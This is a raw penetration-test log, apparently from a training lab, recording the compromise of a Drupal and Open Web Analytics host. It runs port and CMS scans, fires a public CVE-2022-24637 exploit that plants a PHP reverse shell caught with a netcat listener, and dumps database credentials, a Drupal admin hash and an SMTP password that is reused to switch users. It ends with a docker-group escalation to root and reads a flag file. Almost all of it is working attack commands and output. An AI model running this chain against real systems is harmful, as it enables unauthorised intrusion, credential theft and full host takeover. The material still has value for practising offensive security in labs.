nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 11:50 EST
Nmap scan report for 10.11.1.90
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 26:b5:7a:07:ac:09:24:ae:97:3e:73:4e:24:53:0e:09 (RSA)
|   256 83:e9:2b:46:0e:c1:ad:39:2e:52:d8:e9:61:83:4d:1d (ECDSA)
|_  256 ff:81:10:54:cd:b8:41:c6:23:97:2c:26:27:c4:19:af (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Welcome to Tracking | Tracking
|_http-server-header: Apache/2.4.56 (Debian)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 26 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register 
| /user/password /user/login /user/logout /media/oembed 
|_/*/media/oembed
81/tcp open  http    Apache httpd 2.4.56 ((Debian))
| http-title: Login - Open Web Analytics
|_Requested resource was http://10.11.1.90:81/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2F10.11.1.90%3A81%2F&
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/13%OT=22%CT=1%CU=32706%PV=Y%DS=2%DC=I%G=Y%TM=67AE
OS:22F8%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%II=I%TS=A)SEQ(S
OS:P=102%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=
OS:M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE
OS:88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7
OS:%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.56 ms 10.11.1.90
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.51 seconds
 

80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Welcome to Tracking | Tracking
|_http-server-header: Apache/2.4.56 (Debian)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 26 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register 
| /user/password /user/login /user/logout /media/oembed 
|_/*/media/oembed

droopescan scan drupal -u http://10.11.1.90         
 
[+] Plugins found:                                                              
    smtp http://10.11.1.90/modules/smtp/
        http://10.11.1.90/modules/smtp/README.txt
        http://10.11.1.90/modules/smtp/LICENSE.txt
 
[+] No themes found.
 
[+] No version found.
 
[+] Possible interesting urls found:
    Default admin - http://10.11.1.90/user/login
 
[+] Scan finished (0:02:22.606588 elapsed)
 

81/tcp open  http    Apache httpd 2.4.56 ((Debian))
| http-title: Login - Open Web Analytics
|_Requested resource was http://10.11.1.90:81/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2F10.11.1.90%3A81%2F&

python3 CVE-2022-24637.py http://10.11.1.90:81/ password 172.16.1.1 80
 
################################################
#         Script made by 0xM4hm0ud             #
#           Discovered by scryh                #
#                                              #
#       https://github.com/0xM4hm0ud           #
#       https://devel0pment.de/?p=2494         #
################################################
		
[*] Start exploit!
[*] Dont forget to setup a listener on port 80!
[*] Succesfully retrieved the cache!
[*] Succefully retrieved the tempkey:  47f34b4c...
[*] Changing Admin password
[*] Changed Admin password to: password
[*] Trying to login as Admin
[*] Succefully logged in as Admin!
[*] Changing Settings...
[*] Found log path at: /var/www/html/owa/owa-data/logs/
[*] Grabbed nonce: 6f7c04f82d
[*] Succesfully changed settings
[*] Reverse shell at http://10.11.1.90:81/owa-data/logs/shell.php
[*] Triggering reverse shell...

nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.90] 59234
bash: cannot set terminal process group (491): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tracking:/var/www/html/owa/owa-data/logs$ whoami
whoami
www-data

$databases['default']['default'] = array (
  'database' => 'drupal',
  'username' => 'drupal',
  'password' => 'Dr0oPaAlpsSwd',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'namespace' => 'Drupal\\mysql\\Driver\\Database\\mysql',
  'driver' => 'mysql',
  'autoload' => 'core/modules/mysql/src/Driver/Database/mysql/',
);
$settings['config_sync_directory'] = 'sites/default/files/config_JL3f_ntT7P14GhWcVmHbCWPfOsNpwqFG9higtsvVMQUOSJia3kAiOGEfoHeOIZ-IsAr8jgNE3g/sync';

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@tracking:/var/www/html/owa/owa-data/logs$ mysql -u 'drupal' -p'Dr0oPaAlpsSwd'
</owa-data/logs$ mysql -u 'drupal' -p'Dr0oPaAlpsSwd'
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.5.18-MariaDB-0+deb11u1 Debian 11
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| drupal             |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)
 

MariaDB [(none)]> use drupal;
use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MariaDB [drupal]> show tables
show tables
    -> ;
;
+----------------------------------+
| Tables_in_drupal                 |
+----------------------------------+
| batch                            |
| block_content                    |
| block_content__body              |
| block_content_field_data         |
| block_content_field_revision     |
| block_content_revision           |
| block_content_revision__body     |
| cache_bootstrap                  |
| cache_config                     |
| cache_container                  |
| cache_data                       |
| cache_default                    |
| cache_discovery                  |
| cache_dynamic_page_cache         |
| cache_entity                     |
| cache_menu                       |
| cache_page                       |
| cache_render                     |
| cachetags                        |
| comment                          |
| comment__comment_body            |
| comment_entity_statistics        |
| comment_field_data               |
| config                           |
| file_managed                     |
| file_usage                       |
| history                          |
| key_value                        |
| key_value_expire                 |
| menu_link_content                |
| menu_link_content_data           |
| menu_link_content_field_revision |
| menu_link_content_revision       |
| menu_tree                        |
| node                             |
| node__body                       |
| node__comment                    |
| node__field_image                |
| node__field_tags                 |
| node_access                      |
| node_field_data                  |
| node_field_revision              |
| node_revision                    |
| node_revision__body              |
| node_revision__comment           |
| node_revision__field_image       |
| node_revision__field_tags        |
| path_alias                       |
| path_alias_revision              |
| queue                            |
| router                           |
| search_dataset                   |
| search_index                     |
| search_total                     |
| semaphore                        |
| sequences                        |
| sessions                         |
| shortcut                         |
| shortcut_field_data              |
| shortcut_set_users               |
| taxonomy_index                   |
| taxonomy_term__parent            |
| taxonomy_term_data               |
| taxonomy_term_field_data         |
| taxonomy_term_field_revision     |
| taxonomy_term_revision           |
| taxonomy_term_revision__parent   |
| user__roles                      |
| user__user_picture               |
| users                            |
| users_data                       |
| users_field_data                 |
| watchdog                         |

MariaDB [drupal]> select * from users_field_data;
select * from users_field_data;
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
| uid | langcode | preferred_langcode | preferred_admin_langcode | name        | pass                                                    | mail                     | timezone         | status | created    | changed    | access     | login      | init                     | default_langcode |
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
|   0 | en       | en                 | NULL                     |             | NULL                                                    | NULL                     |                  |      0 | 1681207204 | 1681207204 |          0 |          0 | NULL                     |                1 |
|   1 | en       | en                 | NULL                     | drupaladmin | $S$EEf9chKaEBR5X8ayEJuMJ9VAGs6VIMiPDQcsf4JtQKX7r5ariDQ0 | tracking@localhost.local | America/New_York |      1 | 1681207204 | 1681207533 | 1681217416 | 1681217513 | tracking@localhost.local |                1 |
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
2 rows in set (0.001 sec)

╔══════════╣ Analyzing Drupal Files (limit 70)
-r--r--r-- 1 www-data www-data 33957 Apr 11  2023 /var/www/html/drupal/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * 'prefix' setting. If a prefix is specified, the table name will be prepended
 * alphanumeric and underscore. If no prefix is desired, do not set the 'prefix'
 *   'prefix' => 'main_',
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'drupal',
  'username' => 'drupal',
  'password' => 'Dr0oPaAlpsSwd',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',

mysql -u 'sqlusername' -p'sqlpassword'

MariaDB [drupal]> select * from config;

|            | smtp.settings                                        | a:20:{s:5:"_core";a:1:{s:19:"default_config_hash";s:43:"HENvUIeX6xNPGRB1w3z6rT9a71LM_hKXATF6XrM9WvM";}s:7:"smtp_on";b:0;s:9:"smtp_host";s:9:"127.0.0.1";s:15:"smtp_hostbackup";s:0:"";s:9:"smtp_port";s:2:"25";s:13:"smtp_protocol";s:8:"standard";s:12:"smtp_autotls";b:0;s:12:"smtp_timeout";i:30;s:13:"smtp_username";s:8:"tracking";s:13:"smtp_password";s:13:"TracK!n9AdmiN";s:9:"smtp_from";s:24:"tracking@localhost.local";s:13:"smtp_fromname";s:8:"tracking";s:20:"smtp_client_hostname";s:0:"";s:16:"smtp_client_helo";s:0:"";s:14:"smtp_allowhtml";s:1:"0";s:17:"smtp_test_address";s:0:"";s:20:"smtp_reroute_address";s:0:"";s:14:"smtp_debugging";b:0;s:16:"prev_mail_system";s:8:"php_mail";s:14:"smtp_keepalive";b:1;}                                                                                                                                                                                                                                                                                                                            |
 

www-data@tracking:/home$ su tracking
su tracking
Password: TracK!n9AdmiN
 
tracking@tracking:/home$ whoami
whoami
tracking

tracking@tracking:~$ id
id
uid=1000(tracking) gid=1000(tracking) groups=1000(tracking),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
tracking@tracking:~$ 
 

╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(tracking) gid=1000(tracking) groups=1000(tracking),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)

tracking@tracking:~$ docker image ls
REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
alpine       latest    9ed4aefc74f6   22 months ago   7.05MB

tracking@tracking:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt bash
root@411c4a4debaa:/# whoami
root

tracking@tracking:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt bash
root@411c4a4debaa:/# whoami
root
root@411c4a4debaa:/# cat /root/key.txt
6yafx5x4huqavrx6mn9e
root@411c4a4debaa:/# date
Thu Feb 13 16:00:49 EST 2025